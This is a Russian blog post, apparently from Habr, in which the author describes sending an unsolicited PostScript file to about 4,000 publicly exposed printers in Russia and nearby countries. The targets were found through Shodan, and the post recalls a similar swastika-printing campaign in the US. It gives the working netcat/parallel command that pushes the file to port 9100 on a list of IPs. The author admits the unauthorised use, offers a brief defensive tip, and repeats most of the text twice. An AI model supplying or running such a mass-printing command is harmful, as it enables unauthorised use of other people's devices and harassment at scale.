Казалось бы, кто присваивает принтерам публичные IP адреса? Но я недавно нашел интересный скрипт, который позволяет распечатывать все, что угодно на принтерах с публичными IP. Впервые при помощи него распечатали свастику на 20+ тыс. принтеров в США. Я же решил побаловаться с принтерами в РФ, подробности и сам скрипт в продолжении.
Код:
«russia.ps»
— изображение в формате PostScript, которое нужно напечатать
«russiaips»
— это IP адреса принтеров, найденные в Shodan (черный поисковик, примеры поиска в Shodan).
Удалось найти всего около 4 тысяч принтеров (РФ + пару соседних стран), на которые я и
отправил послание. Cамо послание на Хабре публиковать не буду по этическим соображениям, как и список IP адресов, но механизм сбора, думаю, понятен. Данная статья не является призывом к действию и не содержит никакого вредоносного кода, однако заставляет задуматься над безопасностью публично доступных данных и о возможных последствиях.
Способы защиты очевидны — не присваивайте принтерам публичные IP адреса, если в этом нет крайней необходимости.
Как видно, похожие действия могут вызвать существенный общественный резонанс: Статья Washington Post, NY Times, IB Times смотря что печатать.
P.S. Все переживали, что меня забрали «компетентные органы» после статьи «Как мы взломали 18 работающих кардерских магазинов и не взяли ни цента» и «они» же её удалили, это не так, со мной всё ок, никто не приходил, но многие писали, а статью просто удалили за нарушение правил Хабра. Надеюсь, эту не удалят.
Код:
cat /tmp/russiaips | parallel —jobs 40 ‘cat russia.ps | netcat -q 0 {} 9100’
«russia.ps»
— изображение в формате PostScript, которое нужно напечатать
«russiaips»
— это IP адреса принтеров, найденные в Shodan (черный поисковик, примеры поиска в Shodan).
Удалось найти всего около 4 тысяч принтеров (РФ + пару соседних стран), на которые я и
отправил послание. Cамо послание на Хабре публиковать не буду по этическим соображениям, как и список IP адресов, но механизм сбора, думаю, понятен. Данная статья не является призывом к действию и не содержит никакого вредоносного кода, однако заставляет задуматься над безопасностью публично доступных данных и о возможных последствиях.
Способы защиты очевидны — не присваивайте принтерам публичные IP адреса, если в этом нет крайней необходимости.
Как видно, похожие действия могут вызвать существенный общественный резонанс: Статья Washington Post, NY Times, IB Times смотря что печатать.
P.S. Все переживали, что меня забрали «компетентные органы» после статьи «Как мы взломали 18 работающих кардерских магазинов и не взяли ни цента» и «они» же её удалили, это не так, со мной всё ок, никто не приходил, но многие писали, а статью просто удалили за нарушение правил Хабра. Надеюсь, эту не удалят.
